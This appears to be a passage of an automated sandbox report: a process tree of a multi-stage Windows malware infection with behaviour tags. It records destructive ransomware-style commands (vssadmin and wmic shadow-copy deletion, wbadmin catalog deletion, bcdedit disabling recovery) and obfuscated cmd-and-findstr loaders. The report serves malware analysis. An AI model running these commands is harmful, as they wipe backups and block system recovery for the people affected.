                                                    "C:\Users\Admin\AppData\Local\Temp\test.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious behavior: MapViewOfSection
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3932
                                                  • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                    7⤵
                                                      PID:5664
                                                    • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                      7⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5544
                                                    • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                      7⤵
                                                        PID:3624
                                                      • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1308
                                                        • C:\Users\Admin\AppData\Local\Temp\tmpF293_tmp.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\tmpF293_tmp.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:3320
                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                            "C:\Windows\System32\dllhost.exe"
                                                            9⤵
                                                              PID:500
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c cmd < Melagrani.wmv
                                                              9⤵
                                                                PID:6284
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd
                                                                  10⤵
                                                                    PID:6396
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V /R "^zFErbtxvxCRvOCdCwQQLKtqeCGqPfWUhoIWRIBgiXSPjcbyBMIFqYBjfFBARtFubIEguGmUmBJOSgNHyAnrHdTgGcGkiwvraMsDRpZVjNunfMxqRUcdFCnuOfHKZhNnyFvuWlPVBDQTlxZTwGz$" Rivederci.wmv
                                                                      11⤵
                                                                        PID:2972
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping YJTUIPJF -n 30
                                                                        11⤵
                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                        • Runs ping.exe
                                                                        PID:2284
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                        Uno.exe.com B
                                                                        11⤵
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:6124
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                          12⤵
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:6088
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                            13⤵
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:5512
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                              14⤵
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:3984
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                15⤵
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:1996
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                  16⤵
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:2248
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                    17⤵
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:5468
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                      18⤵
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:5988
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                        19⤵
                                                                                          PID:6460
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                            20⤵
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:5940
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                              21⤵
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:1564
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                                22⤵
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:6316
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                                  23⤵
                                                                                                    PID:2864
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                                      24⤵
                                                                                                        PID:6876
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                                          25⤵
                                                                                                            PID:3696
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B
                                                                                                              26⤵
                                                                                                                PID:6852
                                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5792
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-0PTU5.tmp\5.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-0PTU5.tmp\5.tmp" /SL5="$102D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:6196
                                                                            • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\5.exe" /SILENT
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              PID:2584
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-T52OL.tmp\5.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-T52OL.tmp\5.tmp" /SL5="$302B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\5.exe" /SILENT
                                                                                10⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:6684
                                                                        • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4160
                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\6.exe" -a
                                                                            8⤵
                                                                              PID:5748
                                                                          • C:\Users\Admin\AppData\Local\Temp\7.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\7.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:7000
                                                                          • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1428
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c Mon00b1849cf0bf91e9.exe
                                                                      4⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:5304
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00b1849cf0bf91e9.exe
                                                                        Mon00b1849cf0bf91e9.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:6092
                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                          dllhost.exe
                                                                          6⤵
                                                                            PID:3560
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c cmd < Sfaldavano.xls
                                                                            6⤵
                                                                              PID:5636
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd
                                                                                7⤵
                                                                                  PID:5804
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    findstr /V /R "^fARmmICHAETEVIAiewsqLILJhRoBwBFrurUNyycHHdHtUkLfezrMoLJHPojHmwGYYPnRONeXFJaxqGOwySnHnTVxzjYWSOiGKIutNTBfsuin$" Serravano.xls
                                                                                    8⤵
                                                                                      PID:6564
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping YJTUIPJF -n 30
                                                                                      8⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2240
                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                      Amica.exe.com Y
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:1944
                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:4808
                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                          10⤵
                                                                                            PID:2604
                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                              11⤵
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:6404
                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                12⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:6432
                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                  13⤵
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:3476
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                    14⤵
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:772
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                      15⤵
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:1732
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                        16⤵
                                                                                                          PID:6604
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                            17⤵
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:5984
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
                                                                                                              18⤵
                                                                                                                PID:1376
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Mon00e8b91b250904.exe
                                                                                    4⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1884
                                                                              • C:\Windows\SysWOW64\mstsc.exe
                                                                                "C:\Windows\SysWOW64\mstsc.exe"
                                                                                2⤵
                                                                                • Adds Run key to start application
                                                                                • Suspicious use of SetThreadContext
                                                                                • Modifies Internet Explorer settings
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:908
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /c del "C:\Users\Admin\AppData\Local\Temp\test.exe"
                                                                                  3⤵
                                                                                    PID:5296
                                                                                • C:\Users\Admin\AppData\Local\Temp\6449.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\6449.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:6712
                                                                                • C:\Users\Admin\AppData\Local\Temp\6BEB.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\6BEB.exe
                                                                                  2⤵
                                                                                    PID:5228
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 272
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Checks processor information in registry
                                                                                      • Enumerates system info in registry
                                                                                      PID:3952
                                                                                  • C:\Users\Admin\AppData\Local\Temp\85DC.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\85DC.exe
                                                                                    2⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:5320
                                                                                  • C:\Users\Admin\AppData\Local\Temp\90F9.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\90F9.exe
                                                                                    2⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:788
                                                                                  • C:\Users\Admin\AppData\Local\Temp\9540.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\9540.exe
                                                                                    2⤵
                                                                                    • Adds Run key to start application
                                                                                    • Enumerates connected drives
                                                                                    PID:496
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
                                                                                      3⤵
                                                                                      • Enumerates connected drives
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:2604
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                        4⤵
                                                                                          PID:4640
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:6460
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
                                                                                          4⤵
                                                                                          • Drops file in Program Files directory
                                                                                          • Drops file in Windows directory
                                                                                          PID:6116
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                          4⤵
                                                                                            PID:3720
                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                              wmic shadowcopy delete
                                                                                              5⤵
                                                                                                PID:6932
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                              4⤵
                                                                                                PID:572
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                4⤵
                                                                                                  PID:6264
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                  4⤵
                                                                                                  • Checks processor information in registry
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:796
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                  4⤵
                                                                                                    PID:232
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      wmic shadowcopy delete
                                                                                                      5⤵
                                                                                                        PID:5868
                                                                                                    • C:\Windows\SysWOW64\notepad.exe
                                                                                                      notepad.exe
                                                                                                      4⤵
                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                      PID:4592
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 2260
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    PID:5944
                                                                                                • C:\Users\Admin\AppData\Local\Temp\9C94.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\9C94.exe
                                                                                                  2⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:3492
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  2⤵
                                                                                                    PID:6444
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 876
                                                                                                      3⤵
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:2536
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    2⤵
                                                                                                      PID:1164
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      2⤵
                                                                                                        PID:1548
                                                                                                        • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                          "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                          3⤵
                                                                                                            PID:4176
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          2⤵
                                                                                                            PID:4164
                                                                                                            • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                              "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                              3⤵
                                                                                                                PID:4628
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5748
                                                                                                              • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                                "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                                3⤵
                                                                                                                  PID:3708
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                2⤵
                                                                                                                  PID:4076
                                                                                                                  • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                                    "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                                    3⤵
                                                                                                                      PID:2676
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:6604
                                                                                                                    • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                                      "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:2112
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5544
                                                                                                                    • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                                      "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                                      3⤵
                                                                                                                        PID:3760
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      2⤵
                                                                                                                        PID:6880
                                                                                                                        • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                                          "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                                          3⤵
                                                                                                                            PID:4624
                                                                                                                        • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                                                                                          "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                                                                                          2⤵
                                                                                                                            PID:2124
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00e8b91b250904.exe
                                                                                                                          Mon00e8b91b250904.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5544
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5716 -ip 5716
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:2912
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5128 -ip 5128
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:5560
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5960 -ip 5960
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:5332
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6468 -ip 6468
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:6188
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6772 -ip 6772
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:3264
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                          1⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:5336
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 452
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:7024
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6440 -ip 6440
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:6476
                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                          1⤵
                                                                                                                          • Process spawned unexpected child process
                                                                                                                          PID:1504
                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 608 -p 5544 -ip 5544
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          PID:5260
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          1⤵
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:5036
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5336 -ip 5336
                                                                                                                          1⤵
                                                                                                                            PID:2284
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 720 -ip 720
                                                                                                                            1⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:3196
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2380 -ip 2380
                                                                                                                            1⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:2808
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3624 -ip 3624
                                                                                                                            1⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:6548
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6796 -ip 6796
                                                                                                                            1⤵
                                                                                                                              PID:4592
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                              1⤵
                                                                                                                                PID:6024
                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:5664
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6356 -ip 6356
                                                                                                                                1⤵
                                                                                                                                  PID:6452
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6432 -ip 6432
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                  PID:3024
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6292 -ip 6292
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3624
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6812 -ip 6812
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                  PID:6804
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:6224
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
